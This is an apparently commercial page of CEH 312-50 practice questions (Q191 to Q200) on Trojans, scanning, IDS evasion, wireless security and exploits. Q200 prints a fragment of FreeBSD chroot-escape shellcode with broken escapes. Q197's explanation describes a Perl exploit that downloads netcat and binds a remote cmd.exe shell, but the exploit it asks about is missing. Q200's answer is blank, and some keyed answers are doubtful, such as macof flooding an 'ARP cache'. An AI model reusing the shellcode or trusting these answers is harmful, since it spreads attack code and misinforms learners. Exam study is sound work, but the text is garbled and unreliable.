10 Tips For 312-50 IT engineers

Study guides for the most recent EC-Council Ethical Hacking and Countermeasures (CEHv6) certification begin with EC-Council 312-50 preparation products, which are designed to deliver the guaranteed 312-50 questions and help you pass the 312-50 test on your first attempt. Try the free 312-50 demo right now.



Q191. In the context of Trojans, what is the definition of a Wrapper? 

A. An encryption tool to protect the Trojan. 

B. A tool used to bind the Trojan with a legitimate file.

C. A tool used to encapsulate packets within a new header and footer.

D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan. 

Answer: B

Explanation: These wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code. 


Q192. This TCP flag instructs the sending system to transmit all buffered data immediately. 

A. SYN 

B. RST 

C. PSH 

D. URG 

E. FIN 

Answer: C


Q193. Which of the following is not an effective countermeasure against replay attacks? 

A. Digital signatures 

B. Time Stamps 

C. System identification 

D. Sequence numbers 

Answer: C

Explanation: A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. Effective countermeasures are anything that makes it hard to delay or replay the packet (time stamps and sequence numbers) or anything that proves the packet was received as it was sent by the original sender (digital signatures).


Q194. Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result? 

A. The switches will drop into hub mode if the ARP cache is successfully flooded. 

B. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks. 

C. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch. 

D. The switches will route all traffic to the broadcast address, creating collisions.

Answer: A


Q195. An employee wants to defeat detection by a network-based IDS application. He does not want to attack the system containing the IDS application. 

Which of the following strategies can be used to defeat detection by a network-based IDS application? (Choose the best answer) 

A. Create a network tunnel. 

B. Create multiple false positives.

C. Create a SYN flood. 

D. Create a ping flood. 

Answer: A

Explanation: Certain types of encryption present challenges to network-based intrusion detection and may leave the IDS blind to certain attacks, whereas a host-based IDS analyzes the data after it has been decrypted.


Q196. While doing a fast scan using the -F option, which file does nmap use to list the range of ports to scan?

A. services 

B. nmap-services 

C. protocols 

D. ports 

Answer: B

Explanation: Nmap uses the nmap-services file to provide additional port detail for almost every scanning method. Every time a port is referenced, it's compared to an available description in this support file. If the nmap-services file isn't available, nmap reverts to the /etc/services file applicable for the current operating system. 


Q197. What is the expected result of the following exploit? 

A. Opens up a telnet listener that requires no username or password. 

B. Create a FTP server with write permissions enabled. 

C. Creates a share called “sasfile” on the target system. 

D. Creates an account with a user name of Anonymous and a password of noone@nowhere.com. 

Answer: A

Explanation: The script depicted is written in Perl (both msadc.pl and the script they're using as a wrapper). $port, $your, $user, $pass and $host are variables that hold the port # of a DNS server, an IP, username, and FTP password. $host is set to argument variable 0 (which means the string typed directly after the command). Essentially, it connects to an FTP server and downloads nc.exe (the TCP/IP Swiss-army knife, netcat) and uses nc to open a TCP port spawning cmd.exe (cmd.exe is the Win32 DOS shell on NT/2000/2003/XP). When spawned, cmd.exe requires NO username or password and has the permissions of the username it is being executed as (probably guest in this instance, although it could be administrator). The #'s in the script mean the text following is a comment. Notice the last line in particular: if the # were removed, the script would spawn a connection to itself, the host system it was running on.


Q198. In an attempt to secure his 802.11b wireless network, Ulf decides to use strategic antenna positioning. He places the antennas for the access points near the center of the building. For those access points near the outer edge of the building, he uses semi-directional antennas that face towards the building's center. There is a large parking lot and outlying field surrounding the building that extends out half a mile around the building. Ulf figures that with this and his placement of antennas, his wireless network will be safe from attack.

Which of the following statements is true? 

A. With the 300 feet limit of a wireless signal, Ulf’s network is safe. 

B. Wireless signals can be detected from miles away, Ulf’s network is not safe. 

C. Ulf’s network will be safe but only if he doesn’t switch to 802.11a.

D. Ulf’s network will not be safe until he also enables WEP. 

Answer: D


Q199. While scanning a network you observe that all of the web servers in the DMZ are responding to ACK packets on port 80. 

What can you infer from this observation? 

A. They are using Windows based web servers. 

B. They are using UNIX based web servers. 

C. They are not using an intrusion detection system. 

D. They are not using a stateful inspection firewall. 

Answer: D

Explanation: If they used a stateful inspection firewall this firewall would know if there has been a SYN-ACK before the ACK. 


Q200.

#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)>>8), (((x)&0xff0000)>>16), (((x)&0xff000000)>>24)

char infin_loop[]= 

/* for testing purposes */ 

"xEBxFE"; 

char bsdcode[] = 

/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */ 

"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43" 

"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0" 

"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0" 

"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80" 

"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9" 

"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75" 

"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd" 

"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46" 

"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56" 

"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53" 

"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30" 

"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e" 

"x67x6cx69x6e";

static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];

static char *magic_str=NULL; 

int before_len=0; 

char *target=NULL, *username="user", *password=NULL; 

struct targets getit; 

The exploit code above is extracted from what kind of attack?

A. Remote password cracking attack 

B. SQL Injection 

C. Distributed Denial of Service 

D. Cross Site Scripting 

E. Buffer Overflow 

Answer:

Explanation: This is a buffer overflow with its payload in hex format.